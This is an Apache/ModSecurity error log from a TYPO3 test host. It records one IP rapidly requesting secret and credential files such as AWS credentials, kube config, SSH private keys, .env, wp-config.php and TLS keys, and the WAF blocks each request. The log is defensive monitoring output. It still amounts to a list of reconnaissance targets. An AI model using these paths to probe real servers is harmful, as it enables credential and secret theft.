[Sat Jan 25 13:59:58.141401 2025] [:error] [pid 697809] [client 109.202.99.46:26967] [client 109.202.99.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Z5TgTsKsv-Xnv_ylimvWYgAAAAc"]
[Sat Jan 25 13:59:58.144126 2025] [:error] [pid 697481] [client 109.202.99.46:26931] [client 109.202.99.46] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Z5TgTmBk1zPVmSAvZ2_7igAAAAU"]
[Sat Jan 25 13:59:58.144393 2025] [:error] [pid 697481] [client 109.202.99.46:26931] [client 109.202.99.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Z5TgTmBk1zPVmSAvZ2_7igAAAAU"]
[Sat Jan 25 13:59:58.144593 2025] [:error] [pid 697481] [client 109.202.99.46:26931] [client 109.202.99.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Z5TgTmBk1zPVmSAvZ2_7igAAAAU"]
[Sat Jan 25 13:59:58.145902 2025] [:error] [pid 697478] [client 109.202.99.46:60603] [client 109.202.99.46] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z5TgTpaWiFgTDA9ohlnKeAAAAAM"]
[Sat Jan 25 13:59:58.146071 2025] [:error] [pid 697478] [client 109.202.99.46:60603] [client 109.202.99.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z5TgTpaWiFgTDA9ohlnKeAAAAAM"]
[Sat Jan 25 13:59:58.146267 2025] [:error] [pid 697478] [client 109.202.99.46:60603] [client 109.202.99.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z5TgTpaWiFgTDA9ohlnKeAAAAAM"]
[Sat Jan 25 13:59:58.147504 2025] [:error] [pid 697756] [client 109.202.99.46:8047] [client 109.202.99.46] ModSecurity: Warning. Matched phrase ".kube/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .kube/ found within REQUEST_FILENAME: /.kube/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "Z5TgTtavqBpWMKxbPGEO4wAAAAY"]
[Sat Jan 25 13:59:58.147686 2025] [:error] [pid 697756] [client 109.202.99.46:8047] [client 109.202.99.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "Z5TgTtavqBpWMKxbPGEO4wAAAAY"]
[Sat Jan 25 13:59:58.147869 2025] [:error] [pid 697756] [client 109.202.99.46:8047] [client 109.202.99.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "Z5TgTtavqBpWMKxbPGEO4wAAAAY"]
[Sat Jan 25 13:59:58.148475 2025] [:error] [pid 697477] [client 109.202.99.46:19517] [client 109.202.99.46] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z5TgTtIxOx2itQtLRayGpAAAAAI"]
[Sat Jan 25 13:59:58.148668 2025] [:error] [pid 697477] [client 109.202.99.46:19517] [client 109.202.99.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z5TgTtIxOx2itQtLRayGpAAAAAI"]
[Sat Jan 25 13:59:58.148852 2025] [:error] [pid 697477] [client 109.202.99.46:19517] [client 109.202.99.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z5TgTtIxOx2itQtLRayGpAAAAAI"]
[Sat Jan 25 13:59:58.149164 2025] [:error] [pid 697808] [client 109.202.99.46:26965] [client 109.202.99.46] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5TgTlkaCSW66irQ4OAmVQAAAAE"]
[Sat Jan 25 13:59:58.149308 2025] [:error] [pid 697808] [client 109.202.99.46:26965] [client 109.202.99.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5TgTlkaCSW66irQ4OAmVQAAAAE"]
[Sat Jan 25 13:59:58.149473 2025] [:error] [pid 697808] [client 109.202.99.46:26965] [client 109.202.99.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5TgTlkaCSW66irQ4OAmVQAAAAE"]
[Sat Jan 25 13:59:58.138623 2025] [authz_core:error] [pid 697810] [client 109.202.99.46:17467] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/dump.sql
[Sat Jan 25 13:59:58.248674 2025] [authz_core:error] [pid 706044] [client 109.202.99.46:62599] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yml
[Sat Jan 25 13:59:58.402946 2025] [authz_core:error] [pid 697479] [client 109.202.99.46:46281] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yaml
[Sat Jan 25 13:59:58.453162 2025] [authz_core:error] [pid 697756] [client 109.202.99.46:18137] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/user_secrets.yml
[Sat Jan 25 13:59:58.456934 2025] [:error] [pid 697481] [client 109.202.99.46:48609] [client 109.202.99.46] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z5TgTmBk1zPVmSAvZ2_7iwAAAAU"]
[Sat Jan 25 13:59:58.457200 2025] [:error] [pid 697481] [client 109.202.99.46:48609] [client 109.202.99.46] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/wc.db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z5TgTmBk1zPVmSAvZ2_7iwAAAAU"]
[Sat Jan 25 13:59:58.457519 2025] [:error] [pid 697481] [client 109.202.99.46:48609] [client 109.202.99.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z5TgTmBk1zPVmSAvZ2_7iwAAAAU"]
[Sat Jan 25 13:59:58.457811 2025] [:error] [pid 697481] [client 109.202.99.46:48609] [client 109.202.99.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z5TgTmBk1zPVmSAvZ2_7iwAAAAU"]
[Sat Jan 25 13:59:58.459639 2025] [authz_core:error] [pid 697808] [client 109.202.99.46:26923] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/cloud-config.yml
[Sat Jan 25 13:59:58.461391 2025] [authz_core:error] [pid 697478] [client 109.202.99.46:54257] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml
[Sat Jan 25 13:59:58.463167 2025] [:error] [pid 697810] [client 109.202.99.46:35497] [client 109.202.99.46] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z5TgTqfMGKgo4At4EJfuPwAAAAg"]
[Sat Jan 25 13:59:58.463511 2025] [:error] [pid 697810] [client 109.202.99.46:35497] [client 109.202.99.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z5TgTqfMGKgo4At4EJfuPwAAAAg"]
[Sat Jan 25 13:59:58.463853 2025] [:error] [pid 697810] [client 109.202.99.46:35497] [client 109.202.99.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z5TgTqfMGKgo4At4EJfuPwAAAAg"]
[Sat Jan 25 13:59:58.812354 2025] [:error] [pid 697479] [client 109.202.99.46:51369] [client 109.202.99.46] ModSecurity: Warning. Matched phrase ".ssh/id_rsa" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/id_rsa found within REQUEST_FILENAME: /.ssh/id_rsa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Z5TgTo67QWTMsr0x5iwtNAAAAAQ"]
[Sat Jan 25 13:59:58.812831 2025] [:error] [pid 697479] [client 109.202.99.46:51369] [client 109.202.99.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Z5TgTo67QWTMsr0x5iwtNAAAAAQ"]
[Sat Jan 25 13:59:58.813251 2025] [:error] [pid 697479] [client 109.202.99.46:51369] [client 109.202.99.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Z5TgTo67QWTMsr0x5iwtNAAAAAQ"]
[Sat Jan 25 13:59:58.936533 2025] [authz_core:error] [pid 697481] [client 109.202.99.46:39075] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Sat Jan 25 13:59:58.939742 2025] [authz_core:error] [pid 697756] [client 109.202.99.46:9195] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Jan 25 13:59:58.941363 2025] [authz_core:error] [pid 697810] [client 109.202.99.46:47355] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database.sql
[Sat Jan 25 13:59:58.941458 2025] [:error] [pid 697478] [client 109.202.99.46:19511] [client 109.202.99.46] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z5TgTpaWiFgTDA9ohlnKegAAAAM"]
[Sat Jan 25 13:59:58.941636 2025] [:error] [pid 697478] [client 109.202.99.46:19511] [client 109.202.99.46] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z5TgTpaWiFgTDA9ohlnKegAAAAM"]
[Sat Jan 25 13:59:58.941853 2025] [:error] [pid 697478] [client 109.202.99.46:19511] [client 109.202.99.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z5TgTpaWiFgTDA9ohlnKegAAAAM"]
[Sat Jan 25 13:59:58.942023 2025] [:error] [pid 697478] [client 109.202.99.46:19511] [client 109.202.99.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z5TgTpaWiFgTDA9ohlnKegAAAAM"]
[Sat Jan 25 13:59:58.943417 2025] [:error] [pid 697808] [client 109.202.99.46:64379] [client 109.202.99.46] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Z5TgTlkaCSW66irQ4OAmVwAAAAE"]
[Sat Jan 25 13:59:58.943685 2025] [:error] [pid 697808] [client 109.202.99.46:64379] [client 109.202.99.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Z5TgTlkaCSW66irQ4OAmVwAAAAE"]
[Sat Jan 25 13:59:58.943832 2025] [:error] [pid 697808] [client 109.202.99.46:64379] [client 109.202.99.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Z5TgTlkaCSW66irQ4OAmVwAAAAE"]
[Sat Jan 25 13:59:59.211607 2025] [:error] [pid 697479] [client 109.202.99.46:19529] [client 109.202.99.46] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Z5TgT467QWTMsr0x5iwtNQAAAAQ"]
